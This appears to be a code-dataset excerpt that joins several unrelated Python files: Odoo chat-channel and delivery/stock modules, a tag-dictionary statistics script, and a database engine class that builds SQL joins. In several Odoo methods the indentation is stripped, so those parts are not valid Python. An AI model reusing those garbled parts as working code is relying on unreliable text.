            if partner_channels.ids:
                partner_channel = partner_channels.filtered(lambda c: channel.id == c.channel_id.id)
                if len(partner_channel) >= 1:
                    partner_channel = partner_channel[0]
                    info['state'] = partner_channel.fold_state or 'open'
                    info['is_minimized'] = partner_channel.is_minimized
                    info['seen_message_id'] = partner_channel.seen_message_id.id
                # add needaction and unread counter, since the user is logged
                info['message_needaction_counter'] = channel.message_needaction_counter
                info['message_unread_counter'] = channel.message_unread_counter
            channel_infos.append(info)
        return channel_infos
@api.multi
def channel_fetch_message(self, last_id=False, limit=20):
""" Return message values of the current channel.
:param last_id : last message id to start the research
:param limit : maximum number of messages to fetch
:returns list of messages values
:rtype : list(dict)
"""
self.ensure_one()
domain = [("channel_ids", "in", self.ids)]
if last_id:
domain.append(("id", "<", last_id))
return self.env['mail.message'].message_fetch(domain=domain, limit=limit)
# User methods
    @api.model
    def channel_get(self, partners_to, pin=True):
        """ Get the canonical private channel between some partners, create it if needed.
            To reuse an old channel (conversation), this one must be private, and contains
            only the given partners.
            :param partners_to : list of res.partner ids to add to the conversation
            :param pin : True if getting the channel should pin it for the current user
            :returns a channel header, or False if the users_to was False
            :rtype : dict
        """
        if partners_to:
            # the current user is always part of the conversation
            partners_to.append(self.env.user.partner_id.id)
            # determine type according to the number of partner in the channel
            # look for an existing private chat whose member set is exactly
            # `partners_to` (COUNT == len ensures no extra member)
            self.env.cr.execute("""
                SELECT P.channel_id as channel_id
                FROM mail_channel C, mail_channel_partner P
                WHERE P.channel_id = C.id
                    AND C.public LIKE 'private'
                    AND P.partner_id IN %s
                    AND channel_type LIKE 'chat'
                GROUP BY P.channel_id
                HAVING COUNT(P.partner_id) = %s
            """, (tuple(partners_to), len(partners_to),))
            result = self.env.cr.dictfetchall()
            if result:
                # get the existing channel between the given partners
                channel = self.browse(result[0].get('channel_id'))
                # pin up the channel for the current partner
                if pin:
                    self.env['mail.channel.partner'].search([('partner_id', '=', self.env.user.partner_id.id), ('channel_id', '=', channel.id)]).write({'is_pinned': True})
            else:
                # create a new one
                channel = self.create({
                    'channel_partner_ids': [(4, partner_id) for partner_id in partners_to],
                    'public': 'private',
                    'channel_type': 'chat',
                    'email_send': False,
                    'name': ', '.join(self.env['res.partner'].sudo().browse(partners_to).mapped('name')),
                })
                # broadcast the channel header to the other partner (not me)
                channel._broadcast(partners_to)
            return channel.channel_info()[0]
        return False
@api.model
def channel_get_and_minimize(self, partners_to):
channel = self.channel_get(partners_to)
if channel:
self.channel_minimize(channel['uuid'])
return channel
    @api.model
    def channel_fold(self, uuid, state=None):
        """ Update the fold_state of the given session. In order to synchronize web browser
            tabs, the change is also broadcast to the current user's own bus channel.
            Note: the user needs to be logged in
            :param state : the new status of the session for the current user;
                           when falsy, the state is toggled (open <-> folded).
        """
        domain = [('partner_id', '=', self.env.user.partner_id.id), ('channel_id.uuid', '=', uuid)]
        for session_state in self.env['mail.channel.partner'].search(domain):
            if not state:
                # no explicit state requested: toggle the current one
                state = session_state.fold_state
                if session_state.fold_state == 'open':
                    state = 'folded'
                else:
                    state = 'open'
            session_state.write({
                'fold_state': state,
                'is_minimized': bool(state != 'closed'),
            })
            self.env['bus.bus'].sendone((self._cr.dbname, 'res.partner', self.env.user.partner_id.id), session_state.channel_id.channel_info()[0])
@api.model
def channel_minimize(self, uuid, minimized=True):
values = {
'fold_state': minimized and 'open' or 'closed',
'is_minimized': minimized
}
domain = [('partner_id', '=', self.env.user.partner_id.id), ('channel_id.uuid', '=', uuid)]
channel_partners = self.env['mail.channel.partner'].search(domain)
channel_partners.write(values)
self.env['bus.bus'].sendone((self._cr.dbname, 'res.partner', self.env.user.partner_id.id), channel_partners.channel_id.channel_info()[0])
    @api.model
    def channel_pin(self, uuid, pinned=False):
        """ Pin or unpin the channel identified by `uuid` for the current
        user; unpinning pushes an 'unsubscribe' header over the bus. """
        # add the person in the channel, and pin it (or unpin it)
        channel = self.search([('uuid', '=', uuid)])
        channel_partners = self.env['mail.channel.partner'].search([('partner_id', '=', self.env.user.partner_id.id), ('channel_id', '=', channel.id)])
        if not pinned:
            self.env['bus.bus'].sendone((self._cr.dbname, 'res.partner', self.env.user.partner_id.id), channel.channel_info('unsubscribe')[0])
        if channel_partners:
            channel_partners.write({'is_pinned': pinned})
    @api.multi
    def channel_seen(self):
        """ Mark the channel as fully read for the current user.

        Returns the id of the last message, or None (implicitly) when the
        channel has no message, in which case nothing is written. """
        self.ensure_one()
        if self.channel_message_ids.ids:
            last_message_id = self.channel_message_ids.ids[0] # zero is the index of the last message
            self.env['mail.channel.partner'].search([('channel_id', 'in', self.ids), ('partner_id', '=', self.env.user.partner_id.id)]).write({'seen_message_id': last_message_id})
            # let the user's other browser tabs know the channel was read
            self.env['bus.bus'].sendone((self._cr.dbname, 'res.partner', self.env.user.partner_id.id), {'info': 'channel_seen', 'id': self.id, 'last_message_id': last_message_id})
            return last_message_id
@api.multi
def channel_invite(self, partner_ids):
""" Add the given partner_ids to the current channels and broadcast the channel header to them.
:param partner_ids : list of partner id to add
"""
partners = self.env['res.partner'].browse(partner_ids)
# add the partner
for channel in self:
partners_to_add = partners - channel.channel_partner_ids
channel.write({'channel_last_seen_partner_ids': [(0, 0, {'partner_id': partner_id}) for partner_id in partners_to_add.ids]})
for partner in partners_to_add:
notification = _('<div class="o_mail_notification">joined <a href="#" class="o_channel_redirect" data-oe-id="%s">#%s</a></div>') % (self.id, self.name,)
self.message_post(body=notification, message_type="notification", subtype="mail.mt_comment", author_id=partner.id)
# broadcast the channel header to the added partner
self._broadcast(partner_ids)
#------------------------------------------------------
# Instant Messaging View Specific (Slack Client Action)
#------------------------------------------------------
    @api.model
    def get_init_notifications(self):
        """ Get unread messages and old messages received less than AWAY_TIMER
            ago for minimized channels ONLY. This aims to restore the minimized
            channel windows when refreshing the page.
            Note : the user needs to be logged in.
        """
        # get the current user's minimized channels
        minimized_channels = self.env['mail.channel.partner'].search([('is_minimized', '=', True), ('partner_id', '=', self.env.user.partner_id.id)]).mapped('channel_id')
        # get the messages newer than the AWAY_TIMER threshold
        threshold = datetime.datetime.now() - datetime.timedelta(seconds=AWAY_TIMER)
        threshold = threshold.strftime(DEFAULT_SERVER_DATETIME_FORMAT)
        domain = [('channel_ids', 'in', minimized_channels.ids), ('create_date', '>', threshold)]
        # restrict further to messages since the last poll of the user, if any
        presence = self.env['bus.presence'].search([('user_id', '=', self._uid)], limit=1)
        if presence:
            domain.append(('create_date', '>', presence.last_poll))
        # do the message search
        message_values = self.env['mail.message'].message_fetch(domain=domain)
        # create the notifications (channel infos first, then messages)
        notifications = []
        for channel_info in minimized_channels.channel_info():
            notifications.append([(self._cr.dbname, 'res.partner', self.env.user.partner_id.id), channel_info])
        for message_value in message_values:
            for channel_id in message_value['channel_ids']:
                if channel_id in minimized_channels.ids:
                    # Emit one notification per (minimized) channel, with
                    # channel_ids narrowed to that single channel.
                    message_value['channel_ids'] = [channel_id]
                    notifications.append([(self._cr.dbname, 'mail.channel', channel_id), dict(message_value)])
        return notifications
    @api.model
    def channel_fetch_slot(self):
        """ Return the channels of the user grouped by 'slot' (channel, direct_message or private_group), and
            the mapping between partner_id/channel_id for direct_message channels.
            :returns dict : the grouped channels and the mapping
        """
        values = {}
        my_partner_id = self.env.user.partner_id.id
        # Channels the current user has pinned (used for direct messages below).
        pinned_channels = self.env['mail.channel.partner'].search([('partner_id', '=', my_partner_id), ('is_pinned', '=', True)]).mapped('channel_id')
        # get the group/public channels
        values['channel_channel'] = self.search([('channel_type', '=', 'channel'), ('public', 'in', ['public', 'groups']), ('channel_partner_ids', 'in', [my_partner_id])]).channel_info()
        # get the pinned 'direct message' channel
        direct_message_channels = self.search([('channel_type', '=', 'chat'), ('id', 'in', pinned_channels.ids)])
        values['channel_direct_message'] = direct_message_channels.channel_info()
        # get the private group
        values['channel_private_group'] = self.search([('channel_type', '=', 'channel'), ('public', '=', 'private'), ('channel_partner_ids', 'in', [my_partner_id])]).channel_info()
        return values
@api.model
def channel_search_to_join(self, name=None, domain=None):
""" Return the channel info of the channel the current partner can join
:param name : the name of the researched channels
:param domain : the base domain of the research
:returns dict : channel dict
"""
if not domain:
domain = []
domain = expression.AND([
[('channel_type', '=', 'channel')],
[('channel_partner_ids', 'not in', [self.env.user.partner_id.id])],
[('public', '!=', 'private')],
domain
])
if name:
domain = expression.AND([domain, [('name', 'ilike', '%'+name+'%')]])
return self.search(domain).read(['name', 'public', 'uuid', 'channel_type'])
    @api.multi
    def channel_join_and_get_info(self):
        """Subscribe the current user to this channel and return its header
        dict (also pushed to the user's own bus so open tabs pick it up)."""
        self.ensure_one()
        if self.channel_type == 'channel' and not self.email_send:
            # Chat-like channels announce the arrival with a notification post.
            notification = _('<div class="o_mail_notification">joined <a href="#" class="o_channel_redirect" data-oe-id="%s">#%s</a></div>') % (self.id, self.name,)
            self.message_post(body=notification, message_type="notification", subtype="mail.mt_comment")
        self.action_follow()
        channel_info = self.channel_info()[0]
        self.env['bus.bus'].sendone((self._cr.dbname, 'res.partner', self.env.user.partner_id.id), channel_info)
        return channel_info
    @api.model
    def channel_create(self, name, privacy='public'):
        """ Create a channel and add the current partner, broadcast it (to make the user directly
            listen to it when polling)
            :param name : the name of the channel to create
            :param privacy : privacy of the channel. Should be 'public' or 'private'.
            :return dict : channel header
        """
        # create the channel; (4, id) links the current partner as a member
        new_channel = self.create({
            'name': name,
            'public': privacy,
            'email_send': False,
            'channel_partner_ids': [(4, self.env.user.partner_id.id)]
        })
        channel_info = new_channel.channel_info('creation')[0]
        # Post a "created" notification in the new channel itself.
        notification = _('<div class="o_mail_notification">created <a href="#" class="o_channel_redirect" data-oe-id="%s">#%s</a></div>') % (new_channel.id, new_channel.name,)
        new_channel.message_post(body=notification, message_type="notification", subtype="mail.mt_comment")
        # Push the header to the creator's bus so the window opens immediately.
        self.env['bus.bus'].sendone((self._cr.dbname, 'res.partner', self.env.user.partner_id.id), channel_info)
        return channel_info
    @api.model
    def get_mention_suggestions(self, search, limit=8):
        """ Return 'limit'-first channels' id, name and public fields such that the name matches a
            'search' string. Exclude channels of type chat (DM), and private channels the current
            user isn't registered to. """
        # A channel matches when its name matches AND it is either non-private
        # or one of the current partner's channels.
        domain = expression.AND([
                        [('name', 'ilike', search)],
                        [('channel_type', '=', 'channel')],
                        expression.OR([
                            [('public', '!=', 'private')],
                            [('channel_partner_ids', 'in', [self.env.user.partner_id.id])]
                        ])
                    ])
        return self.search_read(domain, ['id', 'name', 'public'], limit=limit)
    @api.model
    def channel_fetch_listeners(self, uuid):
        """ Return the id, name and email of partners listening to the given channel """
        # Raw SQL joining members to partners; `uuid` is passed as a bind
        # parameter (not string-interpolated), so this is injection-safe.
        self._cr.execute("""
            SELECT P.id, P.name, P.email
            FROM mail_channel_partner CP
            INNER JOIN res_partner P ON CP.partner_id = P.id
            INNER JOIN mail_channel C ON CP.channel_id = C.id
            WHERE C.uuid = %s""", (uuid,))
        return self._cr.dictfetchall()
@api.multi
def channel_fetch_preview(self):
""" Return the last message of the given channels """
self._cr.execute("""
SELECT mail_channel_id AS id, MAX(mail_message_id) AS message_id
FROM mail_message_mail_channel_rel
WHERE mail_channel_id IN %s
GROUP BY mail_channel_id
""", (tuple(self.ids),))
channels_preview = dict((r['message_id'], r) for r in self._cr.dictfetchall())
last_messages = self.env['mail.message'].browse(channels_preview.keys()).message_format()
for message in last_messages:
channel = channels_preview[message['id']]
del(channel['message_id'])
channel['last_message'] = message
return channels_preview.values()
| gpl-3.0 |
eponvert/texnlp | src/main/python/oracle_tagger.py | 2 | 3346 | ###############################################################################
## Copyright (C) 2007 Jason Baldridge, The University of Texas at Austin
##
## This library is free software; you can redistribute it and#or
## modify it under the terms of the GNU Lesser General Public
## License as published by the Free Software Foundation; either
## version 2.1 of the License, or (at your option) any later version.
##
## This library is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public
## License along with this program; if not, write to the Free Software
## Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
##############################################################################
import sys
import gzip
import fnmatch
def _smart_open(filename):
    """Open *filename* for reading, transparently decompressing .gz files."""
    if fnmatch.fnmatch(filename, "*.gz"):
        return gzip.open(filename)
    return open(filename, "r")  # open() replaces the removed-in-Py3 file()

train_filename = sys.argv[1]
dict_filename = sys.argv[2]
test_filename = sys.argv[3]

# train/test files are opened for parity with the (commented-out) tagger code
# below; only the tag dictionary is used by the active statistics.
train_file = _smart_open(train_filename)
dict_file = _smart_open(dict_filename)
test_file = _smart_open(test_filename)

tag_set = set()
tag_dict = {}

# Build word -> set-of-tags from the dictionary file: one "word tag" pair per
# non-empty line.
for line in dict_file:
    line = line.strip()
    if line:
        word, tag = line.split()
        # setdefault replaces the dict.has_key() idiom removed in Python 3.
        tag_dict.setdefault(word, set()).add(tag)
        tag_set.add(tag)
        #tag_counts[tag] = tag_counts.get(tag, 0) + 1

# Report: tag-set size, the largest per-word ambiguity class, and the average
# number of tags per word.  print() works identically under Python 2 and 3
# for a single argument.
print(len(tag_set))

total = 0
max_tags = 0  # renamed from `max`, which shadowed the builtin
for word in tag_dict:
    total += len(tag_dict[word])
    if len(tag_dict[word]) > max_tags:
        max_tags = len(tag_dict[word])
print(max_tags)
print(float(total) / len(tag_dict))
#num_tags = len(tag_set)
#
#tag_counts = {}
#for line in train_file:
# line = line.strip()
# if len(line) > 0:
# word, tag = line.split()
# if word in tag_dict:
# for tag in tag_dict[word]:
# tag_counts[tag] = tag_counts.get(tag, 0.0) + 1.0/len(tag_dict[word])
# #else:
# # for tag in tag_set:
# # tag_counts[tag] = tag_counts.get(tag, 0.0) + 1.0/num_tags
#
#
#most_freq_in_tag_dict = {}
#for word in tag_dict:
# most_freq_tag = ""
# highest = 0
# for tag in tag_dict[word]:
# if tag_counts[tag] > highest:
# most_freq_tag = tag
# highest = tag_counts[tag]
# most_freq_in_tag_dict[word] = most_freq_tag
#
#most_freq_tag = ""
#highest = 0
#for tag in tag_counts:
# if tag_counts[tag] > highest:
# most_freq_tag = tag
# highest = tag_counts[tag]
#
#for line in test_file:
# line = line.strip()
# if len(line) > 0:
# word, tag = line.split()
# if word in tag_dict:
# print word + "\t" + most_freq_in_tag_dict[word]
# #print word + "\t" + tag
# #if tag in tag_dict[word]:
# # print word + "\t" + tag
# #else:
# # print word + "\tKWUT:"+tag
# else:
# print word + "\t" + most_freq_tag
# #print word + "\t" + tag
# #print word + "\tUWUT:"+tag
#
# else:
# print
| lgpl-3.0 |
QianBIG/odoo | addons/delivery/stock.py | 1 | 10707 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields,osv
from openerp.tools.translate import _
import openerp.addons.decimal_precision as dp
# Overloaded stock_picking to manage carriers :
class stock_picking(osv.osv):
    """stock.picking extension adding carrier assignment, weight computation
    and shipping-cost invoicing for deliveries."""
    _inherit = 'stock.picking'
    def _cal_weight(self, cr, uid, ids, name, args, context=None):
        # Function-field computation: sum the gross/net weight of all
        # non-cancelled moves of each picking.
        res = {}
        for picking in self.browse(cr, uid, ids, context=context):
            total_weight = total_weight_net = 0.00
            for move in picking.move_lines:
                if move.state != 'cancel':
                    total_weight += move.weight
                    total_weight_net += move.weight_net
            res[picking.id] = {
                'weight': total_weight,
                'weight_net': total_weight_net,
            }
        return res
    def _get_picking_line(self, cr, uid, ids, context=None):
        # Store-trigger helper: map changed stock.move ids to the pickings
        # whose stored weights must be recomputed.
        result = {}
        for line in self.pool.get('stock.move').browse(cr, uid, ids, context=context):
            result[line.picking_id.id] = True
        return result.keys()
    _columns = {
        'carrier_id':fields.many2one("delivery.carrier","Carrier"),
        'volume': fields.float('Volume', copy=False),
        'weight': fields.function(_cal_weight, type='float', string='Weight', digits_compute= dp.get_precision('Stock Weight'), multi='_cal_weight',
                  store={
                 'stock.picking': (lambda self, cr, uid, ids, c={}: ids, ['move_lines'], 40),
                 'stock.move': (_get_picking_line, ['state', 'picking_id', 'product_id','product_uom_qty','product_uom'], 40),
                 }),
        'weight_net': fields.function(_cal_weight, type='float', string='Net Weight', digits_compute= dp.get_precision('Stock Weight'), multi='_cal_weight',
                  store={
                 'stock.picking': (lambda self, cr, uid, ids, c={}: ids, ['move_lines'], 40),
                 'stock.move': (_get_picking_line, ['state', 'picking_id', 'product_id','product_uom_qty','product_uom'], 40),
                 }),
        'carrier_tracking_ref': fields.char('Carrier Tracking Ref', copy=False),
        'number_of_packages': fields.integer('Number of Packages', copy=False),
        'weight_uom_id': fields.many2one('product.uom', 'Unit of Measure', required=True,readonly="1",help="Unit of measurement for Weight",),
        }
    def _prepare_shipping_invoice_line(self, cr, uid, picking, invoice, context=None):
        """Prepare the invoice line to add to the shipping costs to the shipping's
        invoice.
            :param browse_record picking: the stock picking being invoiced
            :param browse_record invoice: the stock picking's invoice
            :return: dict containing the values to create the invoice line,
                     or None to create nothing
        """
        carrier_obj = self.pool.get('delivery.carrier')
        grid_obj = self.pool.get('delivery.grid')
        currency_obj = self.pool.get('res.currency')
        # Nothing to add when there is no carrier, or when the carrier product
        # is already present on one of the invoice lines.
        if not picking.carrier_id or \
            any(inv_line.product_id.id == picking.carrier_id.product_id.id
                for inv_line in invoice.invoice_line):
            return None
        grid_id = carrier_obj.grid_get(cr, uid, [picking.carrier_id.id],
                picking.partner_id.id, context=context)
        if not grid_id:
            raise osv.except_osv(_('Warning!'),
                    _('The carrier %s (id: %d) has no delivery grid!') \
                            % (picking.carrier_id.name,
                               picking.carrier_id.id))
        # Price from the delivery grid, converted to the invoice currency if
        # it differs from the company currency.
        quantity = sum([line.product_uom_qty for line in picking.move_lines])
        price = grid_obj.get_price_from_picking(cr, uid, grid_id,
                invoice.amount_untaxed, picking.weight, picking.volume,
                quantity, context=context)
        if invoice.company_id.currency_id.id != invoice.currency_id.id:
            price = currency_obj.compute(cr, uid, invoice.company_id.currency_id.id, invoice.currency_id.id,
                price, context=dict(context or {}, date=invoice.date_invoice))
        # Income account: product's own, falling back to its category's.
        account_id = picking.carrier_id.product_id.property_account_income.id
        if not account_id:
            account_id = picking.carrier_id.product_id.categ_id\
                    .property_account_income_categ.id
        taxes = picking.carrier_id.product_id.taxes_id
        partner = picking.partner_id or False
        fp = invoice.fiscal_position or partner.property_account_position
        if partner:
            # Apply the fiscal position mapping to account and taxes.
            account_id = self.pool.get('account.fiscal.position').map_account(cr, uid, fp, account_id)
            taxes_ids = self.pool.get('account.fiscal.position').map_tax(cr, uid, fp, taxes)
        else:
            taxes_ids = [x.id for x in taxes]
        return {
            'name': picking.carrier_id.name,
            'invoice_id': invoice.id,
            'uos_id': picking.carrier_id.product_id.uos_id.id,
            'product_id': picking.carrier_id.product_id.id,
            'account_id': account_id,
            'price_unit': price,
            'quantity': 1,
            'invoice_line_tax_id': [(6, 0, taxes_ids)],
        }
    def _invoice_create_line(self, cr, uid, moves, journal_id, inv_type='out_invoice', context=None):
        # After the standard invoice lines are created, append a shipping-cost
        # line to each invoice of a picking that has a carrier.
        invoice_obj = self.pool.get('account.invoice')
        invoice_line_obj = self.pool.get('account.invoice.line')
        invoice_ids = super(stock_picking, self)._invoice_create_line(cr, uid, moves, journal_id, inv_type=inv_type, context=context)
        delivey_invoices = {}
        for move in moves:
            for invoice in move.picking_id.sale_id.invoice_ids:
                if invoice.id in invoice_ids:
                    delivey_invoices[invoice] = move.picking_id
        if delivey_invoices:
            for invoice, picking in delivey_invoices.items():
                invoice_line = self._prepare_shipping_invoice_line(cr, uid, picking, invoice, context=context)
                if invoice_line:
                    invoice_line_obj.create(cr, uid, invoice_line)
                invoice_obj.button_compute(cr, uid, [invoice.id], context=context, set_total=(inv_type in ('in_invoice', 'in_refund')))
        return invoice_ids
    def _get_default_uom(self, cr, uid, context=None):
        # Default weight UoM: the reference unit (factor == 1) of the kg category.
        uom_categ_id = self.pool.get('ir.model.data').xmlid_to_res_id(cr, uid, 'product.product_uom_categ_kgm')
        return self.pool.get('product.uom').search(cr, uid, [('category_id', '=', uom_categ_id), ('factor', '=', 1)])[0]
    _defaults = {
        'weight_uom_id': lambda self, cr, uid, c: self._get_default_uom(cr, uid, c),
    }
class stock_move(osv.osv):
    """stock.move extension computing per-move gross/net weight and passing
    the sale order's carrier on to the generated picking."""
    _inherit = 'stock.move'
    def _cal_move_weight(self, cr, uid, ids, name, args, context=None):
        # Function-field computation: weight = qty * product (net) weight.
        # Net weight is only computed when a gross weight is set on the product.
        res = {}
        uom_obj = self.pool.get('product.uom')
        for move in self.browse(cr, uid, ids, context=context):
            weight = weight_net = 0.00
            if move.product_id.weight > 0.00:
                converted_qty = move.product_qty
                weight = (converted_qty * move.product_id.weight)
                if move.product_id.weight_net > 0.00:
                    weight_net = (converted_qty * move.product_id.weight_net)
            res[move.id] = {
                'weight': weight,
                'weight_net': weight_net,
            }
        return res
    _columns = {
        'weight': fields.function(_cal_move_weight, type='float', string='Weight', digits_compute= dp.get_precision('Stock Weight'), multi='_cal_move_weight',
                  store={
                 'stock.move': (lambda self, cr, uid, ids, c=None: ids, ['product_id', 'product_uom_qty', 'product_uom'], 30),
                 }),
        'weight_net': fields.function(_cal_move_weight, type='float', string='Net weight', digits_compute= dp.get_precision('Stock Weight'), multi='_cal_move_weight',
                  store={
                 'stock.move': (lambda self, cr, uid, ids, c=None: ids, ['product_id', 'product_uom_qty', 'product_uom'], 30),
                 }),
        'weight_uom_id': fields.many2one('product.uom', 'Unit of Measure', required=True,readonly="1",help="Unit of Measure (Unit of Measure) is the unit of measurement for Weight",),
        }
    def action_confirm(self, cr, uid, ids, context=None):
        """
        Pass the carrier to the picking from the sales order
        (Should also work in case of Phantom BoMs when on explosion the original move is deleted)
        """
        # Collect procurements whose sale order carries a carrier BEFORE
        # confirming, since confirmation may replace/delete moves.
        procs_to_check = []
        for move in self.browse(cr, uid, ids, context=context):
            if move.procurement_id and move.procurement_id.sale_line_id and move.procurement_id.sale_line_id.order_id.carrier_id:
                procs_to_check += [move.procurement_id]
        res = super(stock_move, self).action_confirm(cr, uid, ids, context=context)
        pick_obj = self.pool.get("stock.picking")
        for proc in procs_to_check:
            # Only set the carrier on pickings that do not already have one.
            pickings = list(set([x.picking_id.id for x in proc.move_ids if x.picking_id and not x.picking_id.carrier_id]))
            if pickings:
                pick_obj.write(cr, uid, pickings, {'carrier_id': proc.sale_line_id.order_id.carrier_id.id}, context=context)
        return res
    def _get_default_uom(self, cr, uid, context=None):
        # Default weight UoM: the reference unit (factor == 1) of the kg category.
        uom_categ_id = self.pool.get('ir.model.data').xmlid_to_res_id(cr, uid, 'product.product_uom_categ_kgm')
        return self.pool.get('product.uom').search(cr, uid, [('category_id', '=', uom_categ_id),('factor','=',1)])[0]
    _defaults = {
        'weight_uom_id': lambda self, cr, uid, c: self._get_default_uom(cr, uid, c),
    }
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
henrykironde/weaverhenry | lib/engine.py | 1 | 27970 | import sys
import os
import getpass
import zipfile
import gzip
import tarfile
import urllib
import json
from weaver import DATA_SEARCH_PATHS, DATA_WRITE_PATH
from weaver.lib.warning import Warning
class Engine():
    """A generic database system. Specific database platforms will inherit
    from this class."""
    # Human-readable engine name; set by subclasses.
    name = ""
    instructions = "Enter your database connection information:"
    # Current Database and Table objects being processed.
    db = None
    table = None
    # Lazily-created DB-API connection/cursor (see connect()/disconnect()).
    _connection = None
    _cursor = None
    # Generic-to-platform datatype mapping and required options; subclasses override.
    datatypes = []
    required_opts = []
    # printf-style template used to mark a column as the primary key.
    pkformat = "%s PRIMARY KEY"
    script = None
    debug = False
    warnings = []
    opts={}
    def url_string(self):
        # Placeholder: subclasses may return a platform connection URL string.
        pass
    def db_connect(self):
        # Placeholder: subclasses may implement platform-specific connection setup.
        pass
    def create_joins(self):
        # Placeholder: subclasses may implement join creation.
        pass
    def create_query(self,config):
        """
        returns the sql statement required to join the tables.
        The join flavor used is LEFT OUTER JOIN and the first table is
        considered as the base table.

        :param config: path to a JSON settings file listing, per join, the
                       tables involved ('join'), the attributes to project
                       per table, each table's database name, and the columns
                       to join on ('join_on').
        """
        # read configurations from json settings file
        with open(config) as json_data_file:
            data = json.load(json_data_file)
        unique_tables = set() # avoid repetition on table processing
        number_of_joins = len(data['tables'])
        processed_tables = 0 # number of processed tables
        query_string = ""
        item = 0
        for items in data['tables']:
            # loops through consecutive joins on two considered tables
            number_of_tables = len(items["join"])
            current_table = 0
            # The very first table opens the outer "SELECT * FROM (" wrapper;
            # every later join group is attached with LEFT OUTER JOIN.
            if len(unique_tables) == 0 and processed_tables == 0:
                query_string += " SELECT * FROM ( "
            else:
                query_string += " LEFT OUTER JOIN "
            # SQL += "JOIN ("
            for table in items["join"]: # look up the tables
                if table not in unique_tables:
                    if len(unique_tables) == 0:
                        query_string += " SELECT "
                    else:
                        if current_table == 0:
                            query_string += " ( SELECT "
                        else:
                            query_string += " LEFT OUTER JOIN ( SELECT "
                    # use the table name to get the values of attributes
                    # Select <Attributes>
                    attributes = data[table]["attributes_to_project"]
                    attribute_length = len(data[table]["attributes_to_project"])
                    # select attribute, attribute, ...[,] (no comma on the last one)
                    for attribute in attributes:
                        if attribute_length == 1:
                            query_string += (attribute + " ")
                        else:
                            query_string += (attribute + ", ")
                        attribute_length -= 1
                    # Select <Attributes> FROM <database>.<table>
                    query_string += "FROM "
                    query_string += data[table]["database_name"] + "." + table + " "
                    # add a join <JOIN ( SELECT> if there are more expected tables and Using clause
                    # add alias for the derived tables (temp0, temp1, ...)
                    if len(unique_tables) == 0:
                        query_string += " ) " + "temp" + str(item)
                        item += 1
                    else:
                        query_string += " ) "
                    current_table += 1
                number_of_tables -= 1 # decrease the number of tables
                unique_tables.add(table) # add the table so that we do not join it again
                processed_tables += 1
            # Close the derived table with an alias and a USING(...) clause
            # listing the join columns for this join group.
            query_string += " temp" + str(item) + " USING ("
            item += 1
            pivot_len = len(items["join_on"]) # number of attributes used in the join
            for pivots in items["join_on"]:
                if pivot_len == 1:
                    query_string += pivots
                else:
                    query_string += pivots + ", "
                pivot_len -= 1
            query_string += ")"
            number_of_joins -= 1
        return query_string+";"
    def connect(self, force_reconnect=False):
        """Return the cached DB connection, creating it on first use.

        :param force_reconnect: when True, drop the current connection first.
        """
        if force_reconnect: self.disconnect()
        if self._connection is None:
            self._connection = self.get_connection()
        return self._connection
    # Accessing engine.connection lazily connects via connect().
    connection = property(connect)
def disconnect(self):
if self._connection:
self.connection.close()
self._connection = None
self._cursor = None
    def get_connection(self):
        '''This method should be overloaded by specific implementations
        of Engine to return a live DB-API connection object.'''
        pass
    def add_to_table(self, data_source):
        """This function adds data to a table from one or more lines specified
        in engine.table.source.

        Cross-tab sources (last column type prefixed 'ct-') are first unpivoted
        into one row per cross-tab cell; other sources are streamed lazily.
        Progress is written to stdout and rows are committed in one batch at
        the end.
        """
        if self.table.columns[-1][1][0][:3] == "ct-":
            # cross-tab data: expand each input line into one output line per
            # cross-tab value, optionally inserting the ct name column.
            lines = gen_from_source(data_source)
            real_lines = []
            for line in lines:
                split_line = line.strip('\n\r\t ').split(self.table.delimiter)
                initial_cols = len(self.table.columns) - (3 if hasattr(self.table, "ct_names") else 2)
                begin = split_line[:initial_cols]
                rest = split_line[initial_cols:]
                n = 0
                for item in rest:
                    if hasattr(self.table, "ct_names"):
                        name = [self.table.ct_names[n]]
                        n += 1
                    else:
                        name = []
                    real_lines.append(self.table.delimiter.join(begin + name + [item]))
            real_line_length = len(real_lines)
        else:
            # this function returns a generator that iterates over the lines in
            # the source data
            def source_gen():
                return (line for line in gen_from_source(data_source)
                        if line.strip('\n\r\t '))
            # use one generator to compute the length of the input
            real_lines, len_source = source_gen(), source_gen()
            real_line_length = sum(1 for _ in len_source)
        total = self.table.record_id + real_line_length
        for line in real_lines:
            if not self.table.fixed_width: line = line.strip()
            if line:
                self.table.record_id += 1
                linevalues = self.table.values_from_line(line)
                types = self.table.get_column_datatypes()
                # Build insert statement with the correct # of values
                try:
                    cleanvalues = [self.format_insert_value(self.table.cleanup.function
                                                           (linevalues[n],
                                                            self.table.cleanup.args),
                                                           types[n])
                                   for n in range(len(linevalues))]
                except Exception as e:
                    # A bad line is skipped with a warning, not a hard failure.
                    self.warning('Exception in line %s: %s' % (self.table.record_id, e))
                    continue
                try:
                    insert_stmt = self.insert_statement(cleanvalues)
                except:
                    if self.debug: print types
                    if self.debug: print linevalues
                    if self.debug: print cleanvalues
                    raise
                try:
                    update_frequency = int(self.update_frequency)
                except:
                    update_frequency = 100
                # Refresh the progress line every `update_frequency` rows,
                # plus on the first and last rows.
                if (self.table.record_id % update_frequency == 0
                    or self.table.record_id == 1
                    or self.table.record_id == total):
                    prompt = "Inserting rows to " + self.table_name() + ": "
                    prompt += str(self.table.record_id) + " / " + str(total)
                    sys.stdout.write(prompt + "\b" * len(prompt))
                try:
                    # Defer the commit: all rows are committed in one batch below.
                    self.execute(insert_stmt, commit=False)
                except:
                    print insert_stmt
                    raise
        print
        self.connection.commit()
